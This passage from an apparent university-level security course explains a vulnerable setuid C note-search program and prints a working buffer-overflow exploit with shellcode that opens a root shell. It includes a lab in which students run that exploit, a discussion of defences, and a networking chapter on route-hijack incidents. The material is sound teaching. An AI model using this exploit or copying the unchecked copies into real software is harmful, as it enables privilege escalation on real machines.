12.     fd = open( "/tmp/notes" , O_RDONLY );
13.     while( printing )
14.         printing = print_notes( fd , user_id , searchstring );
15.     close( fd );
16. }

Four variables are declared in main. First, the integer user_id is declared in line 3. In line 11, this variable is assigned the ID of the person running the program. So, for example, if joe is running the program, then user_id will be assigned the value 501.

Next, the integer fd is declared in line 4. This variable will hold the file descriptor for the file /tmp/notes. The variable fd is tied to the file /tmp/notes in line 12.

Third, the string named searchstring, declared in line 6, will hold the optional command line argument. If argc is greater than 1 then the user did enter the optional argument, and this command line argument is placed in searchstring in line 8. Notice that searchstring has room for 100 bytes, and line 8 copies argv[1] into it whatever its length. If the user did not enter the optional command line argument, then searchstring is made the empty string by placing a NULL in its first position.

The variable printing is initially assigned the value 1 in line 5, so we will always enter the body of the while loop at least once. (Note that in C, if a Boolean expression evaluates to an integer other than zero, the Boolean expression is interpreted as true.) This while loop calls the function named print_notes.
We will look at the function print_notes in a moment, but for now, accept on faith that the function print_notes will look for a note from this user_id containing the searchstring, and if successful, will print out the note to the monitor and then will return the value 1. If the value 1 is returned by print_notes, the while loop (line 13) will iterate again. That will call the function print_notes again, and the function will look further into the file /tmp/notes (picking up where it left off) and again search for a note from this user_id containing the searchstring. The function print_notes will keep setting printing to 1 so long as the user with ID equal to user_id still has notes in the file /tmp/notes. Eventually, there will be no more notes in the file /tmp/notes from this user_id containing the desired searchstring, and, at that point, the function print_notes will return a 0. That ends the while loop's iteration and ends the program.

The print_notes function

Let's now turn our attention to the function print_notes.

1.  int print_notes( int fd , int uid , char * searchstring )
2.  {
3.      int note_length ;
4.      char byte = 0 ;
5.      char note_buffer[ 100 ] ;
6.      note_length = find_user_note( fd , uid );
7.
8.      if( note_length == -1 ) return 0;
9.      read( fd , note_buffer , note_length ) ;
10.     note_buffer[ note_length ] = 0 ;
11.     if( search_note( note_buffer , searchstring ) )
12.         printf( note_buffer );
13.     return 1;
14. }

The integer variable note_length is declared on line 3. On line 6, the function named find_user_note is called, and the return value from this function is placed in note_length. For now, accept on faith that the function find_user_note returns the length of the next note in the file /tmp/notes that was put there by the user with ID equal to user_id. If the function finds no such note, it returns -1.
So, at line 7, the variable note_length will contain either the number of bytes that were in a note left by the user running the program, or will contain the value of -1 if no such note was found. If note_length does equal -1, then zero will be returned to main on line 8, ending the iteration of the while loop in main.

The read function moves sequentially through a file without backing up (unless the position is moved explicitly with lseek, as find_user_note does). In other words, the read function starts reading from a file precisely where the last read function left off. In line 5, a string named note_buffer is declared, and on line 9, we read from the file a number of bytes equal to note_length into the string note_buffer. The practical effect is that note_buffer now contains the next string that was in the file /tmp/notes left by the user running the program. We then, in line 10, terminate the string with a NULL. Note that line 9 simply trusts note_length to be smaller than the 100 bytes that note_buffer holds.

In line 11, we call the function named search_note giving the function as inputs note_buffer (which contains a string left by this particular user found in the file /tmp/notes) and the string searchstring (which contains the characters that the user entered as argv[1]). If the desired searchstring is found within the string note_buffer, the function search_note will return 1 and the contents of note_buffer will be printed to the monitor on line 12. This ensures that we only print out notes from the user running the program if they contain the desired search string.

The find_user_note function

1.  int find_user_note( int fd , int user_uid )
2.  {
3.      int note_uid = -1 ;
4.      unsigned char byte ;
5.      int length;
6.      while( note_uid != user_uid )
7.      {
8.          if( read( fd , &note_uid , 4 ) != 4 )
9.              return -1 ;
10.         if( read( fd , &byte , 1 ) != 1 )
11.             return -1 ;
12.         byte = 0;
13.         length = 0;
14.         while( byte != '\n' )
15.         {
16.             if( read( fd , &byte , 1 ) != 1 )
17.                 return -1;
18.             length = length + 1 ;
19.         }
20.     }
21.     lseek( fd , length * -1 , SEEK_CUR );
22.     return length ;
23. }

The function find_user_note searches through the file with descriptor fd, searching for a note from the user with ID equal to user_uid. If it finds such a note, it returns the length of that note.

The integer note_uid is declared in line 3 and initialized to -1. Recall that when users run the Company Commander's program to leave notes in the file /tmp/notes, their user ID is recorded before their note. The intent is that note_uid will hold the user ID of the note being examined. Since a user ID cannot be equal to -1, the while loop on line 6 always iterates at least once.

The if statement on lines 8-9 reads the user ID from the file /tmp/notes and places this value in note_uid. If we cannot succeed in reading in the user ID, we must be at the end of the file, and we return a value of -1 on line 9. The if statement on lines 10-11 reads past the newline character which always follows the user ID in the file /tmp/notes. Thus, at the start of line 14, note_uid contains the user ID of the note that is about to be read from the file, and the read function is positioned at the first character in this note.

The while loop on lines 14-19 simply reads through the file, byte-by-byte, counting the total number of characters read up to and including the newline that ends the note. The variable length, initialized to zero on line 13, keeps track of this running sum. When we reach a newline character, the while loop on line 14 stops iterating, and length contains the length of the note left by the user with ID equal to note_uid.

We then return to line 6, and examine the Boolean expression governing this while loop. If the ID of the user whose note was just extracted from the file (note_uid) is not equal to the ID of the person running the program (user_uid), then this note that was just extracted is of no interest to us.
We simply execute the while loop on lines 6-20 all over again, placing the ID of the next note in note_uid and counting up the characters in this next note. On the other hand if, upon returning to line 6 and examining the Boolean expression governing this while loop, we find that the ID of the user whose note was just extracted from the file (note_uid) is equal to the ID of the person running the program (user_uid), then we have indeed found a note left by the person running the program. In this case, we exit the line 6 while loop and jump to line 21.

At the start of line 21, we have found a note from the individual running the program, and we know the length of this user's note. But, unfortunately, in determining the length of the user's note we have read past the end of the user's note in the file /tmp/notes. So, in line 21, we reset the read function so that we are back at the start of this user's note. We do this by backing up length characters (an offset of -length from the current position). After line 21, the next call to read will start reading the file /tmp/notes at the start of the note of the user whose ID is in user_uid.

The search_note function

The search_note function takes two arguments: a string containing a note left by the user running the program, and the searchstring that was entered by the user as a command line argument. If the searchstring is found anywhere within the note left by the user, the function returns a value of 1. If the searchstring is not found within the user's note, the function returns a value of 0. You should be able to navigate through this function given the skills you have developed to date. The gory details of the function are left as an exercise.

At this point, we’ll break for the Security Exercise. Let's jump to Security Exercise 10! After the Security Exercise is done, we’ll return to your regularly scheduled lecture.

2. You've Been Hacked!
Back in Chapter 7, we noted that the very first major attack on DoD computer networks took place in February of 1998 and lasted for over a week. The hackers gained administrative (i.e., “root”) access on UNIX machines at 7 Air Force sites and 4 Navy sites, gaining access to logistical, administrative and accounting records. The method used in this early attack—a buffer overflow—has been used countless times ever since. You have just witnessed this buffer overflow in your lab!

Recall that the buffer overflow entails overwriting a buffer in such a way that an executable program is placed in the stack memory. Earlier in the course, we looked at a buffer overflow in general terms. In that earlier example, recalled in the picture shown below, a buffer named alpha_code has been overwritten with an executable program that extends beyond the buffer allotted for alpha_code.

The idea behind the illustration above is that we can overwrite additional stack items, including the return address, which is stored on the stack. The key for the exploit to work is that the return address must be set to the address of alpha_code! If we manage to set the return address to the address of alpha_code, then the return address is the address of the start of the executable program. Then, when the function is done executing, the return address will be retrieved and the executable code that the adversary placed on the stack will start executing. Again, the exploit involves the adversary placing his own program in memory and making it execute.

The program exploit_notesearch.c that you examined in lab simply generates a command string that runs the bettersearchnote.exe program. The function named system will simply run its argument. So the function call system(command); will act as though the user typed in whatever is held in the string named command, and then hit return.
This program will be explained in detail by a separate PowerPoint presentation.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./bettersearchnote.exe \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}

Now, the string named shellcode contains machine language instructions to open a shell prompt. This program executes ./bettersearchnote.exe and causes a buffer overflow that overwrites the return address, pointing to the machine instructions contained in shellcode. These instructions will open a shell.

So… what’s the big deal, you might ask? The problem is that when a user (any old user) executes bettersearchnote.exe, they are running the program as root because the suid flag is set. So… with the program running with elevated privileges, whose shell is opened? The answer: root’s.

So, armed with a root shell, the hacker now has:
full control of the system
the ability to read anyone’s files
the ability to delete anyone’s files
the ability to install any software… including malware.

3. How is a Buffer Overflow Performed?

So... how would you perform a buffer overflow?
You would first attempt to see if this C flaw exists by entering a ridiculously long value (but one that you know) when prompted to enter something, and you would check to see if that causes the program to behave erratically or crash with a segmentation fault. This is an example of a technique known as “fuzz testing” or “fuzzing”. In general, fuzzing is the attempt to find soft spots in a program. If successful, you then can analyze the hex dump to see where your input string resides. You then use this info, plus the source code (usually available for UNIX), to attempt to find where the return address is stored.

Crafting a buffer overflow attack is not easy. Hackers use two clever techniques to make the process a little more manageable. Calling the contents inserted into the buffer the “payload”, we can say that the payload has three sections:

The desired return address, repeated many times at the end of the payload. Why the repetition? This gives the hacker a number of chances to get the address correctly positioned in the return address field.

The executable program (the exploit).

A series of NOP instructions (assembly language “no operation” instructions). This series of NOPs is called the “NOP sled”. Why the NOP sled? It lets the hacker be a little bit off with the return address. The return address just has to point anywhere within the NOP sled. Otherwise the return address would need to be the precise first address of the exploit.

4. Defenses Against the Buffer Overflow Attack

How can we prevent a process from being exploited by a buffer overflow? We mentioned one technique that would surely work: We could add code to the compiler to check the bounds on each and every array reference (i.e., we can make the compiler responsible for ensuring data integrity). But this would significantly slow down all programs, and so is not a solution at all—it would be akin to preventing injuries in automobile accidents by imposing a national 5 MPH speed limit.
We can certainly minimize buffer overflow exploits by very careful coding. In the words of a former member of the NSA's elite hacker unit (the Tailored Access Operations Division), the solution is straightforward: "The bottom line for preventing buffer overflows is to ensure that bounds are checked before stuffing a string into an array or otherwise using it." The programmer must realize that she is responsible for data integrity, and must be vigilant in testing and retesting all code for this potential problem.

Several C library functions are notorious for inviting buffer overflow problems. In our EC310 class, the strcpy function is a well-known culprit. The designers of C have, in fact, provided an improved version of this particular command—the improved version, named strncpy, introduces some protection against writing beyond the end of an array. The format for the strncpy command is

strncpy(destination_string , source_string , number_of_characters_to_copy)

The strncpy command's third argument is the number of characters to copy. The programmer can ensure, through the use of this third argument, that we do not write beyond the bounds of the string destination_string. The function scanf was also revised to permit the user to have some control of the total number of characters read in from the keyboard.

The battle between hackers and programmers never ends. When hackers first started to take advantage of the fact that strcpy allows us to enter strings of any size into buffers of fixed size, programmers responded by writing the strncpy function. Hackers quickly learned that if the source string is longer than the specified number of bytes to be copied, the strncpy function does not automatically append a terminating NULL to the string that is copied. Thus, if the programmer is not careful, a new set of hacks can be developed, based on the existence of strings sitting in memory without a NULL terminator.
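As an added example (it is not code from the chapter or from the book the lab programs come from), the find_user_note scan walked through earlier in this chapter is paired here with a bounds-checked replacement for the unchecked read into note_buffer, which is exactly the "check bounds before stuffing a string into an array" advice above, including writing the NULL terminator explicitly. The record layout (4-byte user ID, newline, note, newline) follows the chapter's description; the user IDs, note texts, the 100-byte buffer and the helper names are assumptions made up for this example.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructed sample records in the layout the chapter describes for
 * /tmp/notes: 4-byte user ID, newline, note text, newline. The IDs and
 * texts are made up for this example. */
struct sample_note { int uid; const char *text; };

static const struct sample_note SAMPLE_NOTES[] = {
    {    0, "Notes for today:" },
    { 1001, "Parades stink" },
    { 1002, "What is for lunch?" },
    { 1001, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"   /* 120-byte note: */
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" }, /* too big for 100 bytes */
    { 1001, "Musters stink" },
};

/* Write the sample records to an unlinked temporary file; return a descriptor
 * positioned at the start of the file, or -1 on failure. */
int make_sample_notes(void) {
    char path[] = "/tmp/notes_example_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    unlink(path);                       /* the file lives only as long as fd is open */
    for (size_t i = 0; i < sizeof SAMPLE_NOTES / sizeof SAMPLE_NOTES[0]; i++) {
        int uid = SAMPLE_NOTES[i].uid;
        const char *text = SAMPLE_NOTES[i].text;
        ssize_t len = (ssize_t)strlen(text);
        if (write(fd, &uid, 4) != 4 || write(fd, "\n", 1) != 1 ||
            write(fd, text, len) != len || write(fd, "\n", 1) != 1) {
            close(fd);
            return -1;
        }
    }
    lseek(fd, 0, SEEK_SET);
    return fd;
}

/* The chapter's scan: skip records until one left by user_uid, return its
 * length (the newline terminator is counted too) with fd rewound to the start
 * of that note, or -1 when the end of the file is reached. */
int find_user_note(int fd, int user_uid) {
    int note_uid = -1;
    unsigned char byte;
    int length = 0;

    while (note_uid != user_uid) {
        if (read(fd, &note_uid, 4) != 4) return -1;   /* user ID field */
        if (read(fd, &byte, 1) != 1) return -1;       /* newline after the ID */
        byte = 0;
        length = 0;
        while (byte != '\n') {                         /* measure the note */
            if (read(fd, &byte, 1) != 1) return -1;
            length = length + 1;
        }
    }
    lseek(fd, length * -1, SEEK_CUR);                  /* back up to the note's start */
    return length;
}

/* Bounds-checked replacement for the unchecked read(fd, note_buffer, note_length):
 * the length is compared with the caller's buffer size before anything is copied,
 * and the NUL is written explicitly (strncpy would not guarantee one).
 * Returns the note length, -2 if the note was too long and was skipped, -1 at EOF. */
int read_user_note(int fd, int user_uid, char *buf, size_t bufsize) {
    int len = find_user_note(fd, user_uid);
    if (len < 0) return -1;
    if ((size_t)len >= bufsize) {       /* len bytes plus the NUL would not fit */
        lseek(fd, len, SEEK_CUR);       /* skip it so the next record is read cleanly */
        return -2;
    }
    if (read(fd, buf, len) != len) return -1;
    if (len > 0 && buf[len - 1] == '\n') len--;        /* drop the record terminator */
    buf[len] = '\0';
    return len;
}

/* Walk uid's notes with a bufsize-byte buffer (bufsize <= 256) and return how
 * many were read (want_skipped == 0) or how many were rejected as too long. */
int count_notes(int uid, size_t bufsize, int want_skipped) {
    char buf[256];
    int fd = make_sample_notes(), readable = 0, skipped = 0, rc;
    if (fd < 0 || bufsize > sizeof buf) return -1;
    while ((rc = read_user_note(fd, uid, buf, bufsize)) != -1)
        if (rc == -2) skipped++; else readable++;
    close(fd);
    return want_skipped ? skipped : readable;
}

int main(void) {
    char note_buffer[100];              /* same fixed size as the lab program's buffer */
    int fd = make_sample_notes(), rc;
    if (fd < 0) return 1;
    while ((rc = read_user_note(fd, 1001, note_buffer, sizeof note_buffer)) != -1) {
        if (rc == -2) printf("skipped a note too long for the buffer\n");
        else printf("%s\n", note_buffer);
    }
    close(fd);
    return 0;
}
```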
Beyond awareness and careful coding, several technical solutions have been proposed.

The non-executable stack. This approach forbids the operating system from executing instructions that are on the stack. Basically, with this approach, the eip register would never be permitted to hold an address that is in the stack's address range. Machine language instructions would not ordinarily be found on the stack (the machine language instructions would be in the text section), so there is no reason for the eip to ever point to the stack's region in memory. It must be noted that this solution still poses some problems. First, it does not prevent a buffer overflow; rather, it prevents a buffer overflow from following through with the execution of machine language instructions that were placed on the stack. This approach does not protect against an adversary crashing our machine on a segmentation fault. Also, some highly specialized applications actually depend on having executable code on the stack.

The canary. This approach entails placing a specific known value on the stack just prior to the return address. This known value is termed a canary (since a canary was used in coal mines to provide an advance indication of danger). An attempt to overwrite the return address will necessarily overwrite the canary. Before a function returns, the canary is checked to see if it has been altered. If the canary has been altered, the program is halted. Hackers have found ways to defeat the use of a canary. First, if known canaries are used (for example, if a canary of -1 is always used), the hacker can perform a buffer overflow, overwriting the return address while making sure that the canary is overwritten with the correct value (-1). If the programmer uses a pseudo-random canary, the hacker can attempt to read the canary value as part of the exploit, taking care to overwrite it with the prior value.

Address Space Layout Randomization (ASLR).
In this technique, the stack and the heap are placed in random memory locations, preventing the hacker from easily predicting the location of the return address. Of course the locations of the stack and the heap are not completely random, but are usually arranged according to a fixed number of possible options. Starting with Vista, Microsoft used ASLR with 256 different possible options for the stack-heap layout. A common counter-hack (not covered in this class) involves using format string vulnerabilities to determine the return address location. Of course hackers are also studying the various layout options and, eventually but certainly, hacks will be developed for each of the layout options.

Practice Problem 10.1
Briefly describe two technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow.
Solution:

Problems

1. Order these three main components of a buffer overflow exploit as they will appear on the stack:
   shellcode
   malicious return address
   nop sled

2. Aside from careful programming and the modification of several specific C commands, list and briefly describe two technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow.

3. Explain why the buffer overflow described in this chapter is much more insidious than the buffer overflows described in Chapter 7.

Security Exercise 10

Part I. Initial Conditions

To set up for this lab, carefully perform the following operations. Check off each step as you complete it. Let your instructor or lab tech know if you encounter any problems.

1. Navigate to your work directory by entering
   cd work
In Lab 9 you used the program note2.c. Make sure that the program note2.c and its compiled machine code version, note2.exe, are both still in your work directory by entering:
   ls
You likely have additional files in your work directory—that's fine!

2.
Recall that the program named note2.c allowed all your Company mates to send you notes. The program has made you famous, and the root user would like to purchase it from you. He will pay you 25,000 Iranian rials for the program. 25,000 is a big number, so of course you accept. Transfer ownership of the program note2.c to the root user by entering:
   sudo chown root:root ./note2.exe
Verify that you have successfully transferred ownership of the file note2.exe to the root user by entering
   ls -l note2.exe

3. Now, the root user wants anyone to be able to execute the program note2.exe as though they were the root user, so that anyone can leave notes in the file /tmp/notes. To give everyone the ability to write to the file /tmp/notes in a very carefully controlled manner (only via the use of the program note2.exe) we must set the setuid permission for the file note2.exe. To do this, enter:
   sudo chmod u+s note2.exe
Verify that the setuid permission is enabled by entering
   ls -l note2.exe

4. In class today we discussed the program bettersearchnote.c. This program has been written for you and placed in the ec310code directory. Copy this file to the work directory by carefully entering the following at the home directory prompt (make sure you are at your home directory!):
   midshipman@EC310:~ $ cp ec310code/bettersearchnote.c work
Verify that you have bettersearchnote.c in your work directory by changing to the work directory:
   cd work
and then listing the files in the work directory:
   ls

5. We need to make one change to bettersearchnote.c. Open the file using nano:
   nano bettersearchnote.c
and change the line in the function main that reads
   fd = open( "/var/notes" , O_RDONLY );
to read
   fd = open( "/tmp/notes" , O_RDONLY );
The only change is that var becomes tmp. Save the program (Control-o then Control-x).

6.
Compile the program bettersearchnote.c as bettersearchnote.exe by entering:
   gcc -o bettersearchnote.exe bettersearchnote.c
Make sure you now have bettersearchnote.exe in your work directory (enter ls).

7. Transfer ownership of bettersearchnote.exe to the root user by entering
   sudo chown root:root ./bettersearchnote.exe
and set the setuid permission on this program by entering
   sudo chmod u+s bettersearchnote.exe
Verify that root owns the program and that the setuid permission is enabled by entering
   ls -l bettersearchnote.exe

After all of these steps are completed, proceed to Part II.

By the time I was a First Lieutenant in the Marine Corps, I earned a Navy Cross, a Silver Star, two Bronze Stars and two Purple Hearts. Can you guess who I am?

Part II. Adding Some Notes

Let's add some notes to the file /tmp/notes. First, let's start fresh by removing any old version of /tmp/notes that might exist. Enter
   rm /tmp/notes
If you get a message saying "No such file or directory", that's okay.

Now, let's say that the root user wants to add a note saying: "Notes for today:". To accomplish this, enter
   sudo su root
   ./note2.exe "Notes for today:"
   exit

Now, let's have joe enter the note "Parades stink". To accomplish this, enter:
   sudo su joe
   ./note2.exe "Parades stink"
   exit

Now, let's have matrix enter the note "What is for lunch?" To accomplish this, enter:
   sudo su matrix
   ./note2.exe "What is for lunch?"
   exit

Finally, let's have joe enter the note "Musters stink". To accomplish this, enter:
   sudo su joe
   ./note2.exe "Musters stink"
   exit

Now, go back to your work directory (you may be there already) and look at the file /tmp/notes by entering
   cat /tmp/notes
It didn't let you see the notes!

Question 1. Why did the command cat /tmp/notes not let you see the notes?

Question 2. What command would you enter to view the file /tmp/notes?

Enter your answer for Question 2 and show your instructor the contents of the file /tmp/notes. Then move on to Part III.

Part III.
Using the Program bettersearchnote.exe

Recall that the program bettersearchnote.exe allows the user to view the notes that he has entered (and only the notes that he has entered). Suppose the user matrix wants to see the notes that she has left. Switch to user matrix:
   sudo su matrix
and run the program as matrix:
   ./bettersearchnote.exe

Question 3. Did the program work as expected?

Return to the user midshipman by entering
   exit

Now recall that the program bettersearchnote.exe allows the user to enter a search string as a command line argument, and the program will then only print out messages left by the user that contain the specified search string. Switch to user joe:
   sudo su joe
and run the program as joe:
   ./bettersearchnote.exe

Question 4. What output did you obtain?

Now, run the program again, but giving a command line argument:
   ./bettersearchnote.exe "Must"

Question 5. What output did you obtain?

Return to the user midshipman by entering
   exit

Switch to user root:
   sudo su root
and run the program as root:
   ./bettersearchnote.exe

Question 6. What does root see when he runs the program?

Question 7. Why doesn't the root user see everyone's notes? He's root after all.

Return to the user midshipman by entering
   exit
and proceed to Part IV.

Part IV. A Strange Occurrence

One of your friends has sent you a note: "Here is a great program named exploit_notesearch.c. Try it out." In the booksrc directory, there resides a file named exploit_notesearch.c. Change to your home directory by entering
   cd
From your home directory, copy this file by entering the following (make sure you are at your home directory!):
   midshipman@EC310:~ $ cp booksrc/exploit_notesearch.c work
Verify that you have exploit_notesearch.c in your work directory by changing to the work directory:
   cd work
and then listing the files in the work directory:
   ls
If you do not have exploit_notesearch.c in your work directory, STOP and ask your instructor or lab tech for assistance. Otherwise, continue.
We have to make one change to this program. Open this program for editing using nano:
   nano exploit_notesearch.c
and change the line that reads
   strcpy(command, "./notesearch \'"); // start command buffer
to read
   strcpy(command, "./bettersearchnote.exe \'"); // start command buffer
Note that this says bettersearchnote, not betternotesearch! Add the .exe to the end! Save the program (Control-o then Control-x).

Compile the program exploit_notesearch.c by entering
   gcc exploit_notesearch.c
and execute the program by entering
   ./a.out

Question 8. What shocking event just happened?

Question 9. Enter whoami. What is the reply?

The programs used in this security exercise are adapted from programs presented in Hacking, The Art of Exploitation, No Starch Press, 2008.

Security Exercise 10 Answer Sheet

Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:

Part II: The Network

You are now experts on the security of an individual host. Well, okay, expert-ish. In this module you will gain an in-depth understanding of how the Internet works today and how fragile its core infrastructure really is. You will learn about the fundamental networking technologies and the design principles behind the Internet, and you will examine the security risks associated with internetworking.

Chapter 11: The TCP/IP Model

Objectives:
(a) Describe the TCP/IP model, the functions performed by each layer, and the process of encapsulation.
(b) Define the function of a protocol.

EC310 is divided into three sections. We finished Part I: The Host, where we examined specific threats against an individual computer in isolation from a network, focusing on the buffer overflow attack. We now move on to Part II: The Network, where you will gain an in-depth understanding of how the Internet works today and how fragile its core infrastructure really is.
After we complete the network section, we will move to our final unit, Part III: Wireless, where you will gain an appreciation for the unique security threats inherent when operating in a wireless environment. (Graphic by Dane Brown and Jennie Wood)

I. An Example of Network Fragility

The Internet was actually designed in the 1970s, long before its security became a concern. As the Internet's protocols were being put in place, the underlying assumption was that the Internet would only be used by cooperating scientists and academics who had no reasons to act with malice toward each other. Since security was not an issue, many of the underlying Internet protocols, to this day, rely on a measure of trust and cooperation among the parties that regulate and control the Internet's infrastructure.

This is particularly true when routing traffic through the Internet. It should be obvious that it is beneficial to route traffic from source to destination using the best path. It would not make sense to route Internet traffic from Boston to New York via Tokyo. The decisions concerning which routes are best for reaching various destinations are largely determined through cooperation among the Internet's routers. Basically, each router tries to determine how easily it can get to various particular destinations, and the routers exchange this information with each other. Through this cooperative exchange, a consensus emerges over which routes are optimal to reach specific destinations from any starting point.

So, with so much cooperation, what could go wrong?

In 2008, a Dutch politician named Geert Wilders released a three and a half minute trailer for a controversial short film that explored the ties between Koranic teachings and terrorism. The trailer and the film (which was subsequently released in 2009) were both critical of Islam and created an uproar in many Muslim-dominated countries. The film trailer also caused an uproar that reverberated throughout the global Internet. [17]
Pakistanis marched through Karachi to protest the video. In response, the Pakistani government ordered that YouTube be blocked in all of Pakistan to prevent Pakistani citizens from viewing the offending movie trailer. On Sunday, February 4th, 2008, Pakistan Telecom, the national ISP, complied with the order to block YouTube by advertising itself to the rest of the world as the best route to reach YouTube. In essence, Pakistan Telecom announced to all the other routers on the Internet: "If you want to reach YouTube, I can get you there nearly instantaneously—so if you want to get to YouTube quick, forward your request to Pakistan Telecom."

A man trying to access YouTube from his home in Karachi had his request routed to Pakistan Telecom instead. But the repercussions extended far beyond the borders of Pakistan. The Internet's routers—throughout the world—assuming that the information was truthful, autonomously adjusted their optimal route to YouTube by sending all worldwide YouTube requests to Pakistan Telecom. Because of the level of trust among the Internet's key players, no verification was made to check if the new route made any sense. Pakistan Telecom—needless to say—simply discarded these requests from people around the world wanting to get to YouTube. Instead of the usual cat videos or clips of old people falling down the stairs, viewers were greeted with this far less entertaining display:

It should be noted that subsequent investigations revealed that Pakistan Telecom only intended to block YouTube within Pakistan; they did not foresee that their actions would affect the broader Internet. Also, Pakistan Telecom did not disrupt the correct routing information that was all the while promulgated by YouTube's servers and Internet routers; it simply promulgated "better" routing information. In any event, the YouTube outage affected the world and lasted for over two hours.
In a similar incident, on Christmas Eve in 2004, a company in Turkey inadvertently announced that it was the best path to everything on the Internet. A report by Todd Underwood of the Internet management firm Renesys concluded that "Virtually everything on the Internet was unreachable for someone: banks, governments, ecommerce sites, businesses, universities–no one escaped the damage." This event lasted several hours.

[17] The interested midshipman can view the controversial movie trailer here: http://www.youtube.com/watch?v=jKCZfnpU1uc

Figure: Worldwide availability of YouTube drops from 100% to 0% for an hour, and does not fully recover for over two hours. (Source: Keynote Systems)

Likewise, in an event that one can only assume was accidental, Con Edison—the electric company for New York City—announced that it was the best route to reach Martha Stewart Living Omnimedia. For several hours, individuals who wanted to check on the right color salad bowl to use at a springtime picnic were routed to the gritty website of a public service utility.

This is a problem affecting the Internet right now. The ease with which a hacker can manipulate routing tables to intercept or redirect Internet traffic remains startling. In November 2013, Renesys noted that on 38 distinct occasions over the period February 2013-November 2013, Internet traffic affecting major financial institutions and government agencies was inexplicably routed through Belarus. The graph below shows the route taken by a banking transaction between New York and Los Angeles that was mysteriously routed through Belarus.

These routing calamities are not limited to the US. On Tuesday January 21, 2014, most of China's 500 million Internet users had all of their Internet traffic redirected to a nondescript residential building in Cheyenne, Wyoming. In short, China was cut off from the Internet for about eight hours.

What would happen if an Internet Service Provider for Iran announced it had the best route to the US DoD?
More to the point: Why does the Internet work this way? For the next five weeks we will pull apart the infrastructure of this mysterious creature called the Internet.

II. Layers

1. Divide and Conquer.

Computer networks are exceedingly complex. To enable effective communication we must attempt to coherently organize the various functions that must be carried out. To reduce the complexity in designing networks, and to make the task more manageable, networks are organized as a series of layers. The guiding principles are:

Each layer performs only a few specific, well-defined functions. This simplifies the design.

The layers are built, one on top of the next. Each layer performs a service for the layer above it. However, how a layer does its job is not known by the layer above. This permits later modifications. A single piece of software that provides all networking capability would be very hard to modify later.

This notion of organizing a network into a series of layers is similar (conceptually) to the way that programs are organized into a series of modular functions.

2. Example.

Suppose you want to send an email to your friend. You have email application software on your computer, and your friend has email application software on her computer. Thus, you can compose an email on your computer using your application, and if this email were to land at the doorstep of the email application on your friend's computer, she could then read it. But… how does this email get from your email application program to your friend's email application program? They are separated by a geographic distance.

You have no idea of how to proceed in getting your email from the email application on your computer to the email application on your friend's computer, so you consult with your friend, the Transport layer. You don't recall when your friend Transport became so verbose, but you decide to leave your problem with him.
Although your friend Transport was willing to help, and has taken custody of your email message, he quickly realizes he cannot proceed. Not knowing what to do, he contacts his friend, the Network layer. You wonder why your friend Network used so many words to say "I can't help you, but I'll see what I can do", but you—Transport—decide to leave your problem (which was actually Application's problem) with your friend Network.

Although your friend Network was willing to help, and has taken custody of the email message, he quickly realizes he cannot proceed. Not knowing what to do, he contacts his friend, the Data Link layer. You wonder why your friend Data Link is such a blabbermouth, but you—Network—are happy you do not have to deal with Rickover Hall personnel, so you leave the email with your friend Data Link.

Although your friend Data Link was willing to help, and has taken custody of the email message, he quickly realizes he needs his friend, the Physical Layer, to help. You wonder why your friend Physical is such a Debbie Downer, but then you remember—all those years in the basement of Rickover!—and you're just happy to get the message to him (and off your desk).

But here is the important point: The physical layers are able to successfully communicate.

So, the original email leaves the email application on the left, travels down the five layers (Application, Transport, Network, Data Link and Physical), then travels across a physical medium, landing at the destination computer. At the destination computer the message transits up the five layers, eventually arriving at the email application of your friend's computer, on the right.

In light of the picture above, recall the guiding principles we mentioned at the outset:

Each layer performs only a few specific, well-defined functions. This simplifies the design.
For example, in the email scenario above, the transport layer only worried about getting the message delivered to the right application (the email application) and having it arrive correctly. The transport layer did not worry about routing (that was left to the network layer) or whether logical one should be represented by +5 volts (that was left to the physical layer).

The layers are built, one on top of the next. Each layer performs a service for the layer above it. However, how a layer does its job is not known by the layer above. This permits later modifications.

For example, the network layer is tasked with determining the best route from source to destination, but the choice of algorithm used should be of no consequence to the transport layer. If we were to change the network layer routing algorithm from a link-state algorithm to a distance-vector algorithm, the transport layer should not even be aware of this. If we decided to try to build one big honking software/hardware contraption that does everything at once (i.e., just put the whole kit and kaboodle into one layer), the resulting mess would be extremely difficult to modify later. Splitting functions into layers simplifies the design. Additionally, it allows us to replace a layer with a different implementation that accomplishes the same task using a different mechanism, without disturbing the other layers.

3. Protocols

It is important to note that actual communication takes place only between the five layers in the same machine and the physical layers of adjacent machines. In the picture on the preceding page, the dark black lines signify the only true transfer of data—i.e., the only real communication. Apart from the physical layer, no data are actually directly transferred from layer n on one machine to layer n on the other machine. Instead, each layer passes information/data only to the layer immediately above or below it.
In a real sense, though, it seems as if the email application in the machine on the left in the picture above is communicating directly with the email application in the machine on the right. Similarly, it seems as if the transport layer on the left is communicating directly with the transport layer on the right. In fact, it seems as if each layer on the left is communicating with its peer layer on the right. This communication is termed virtual communication.

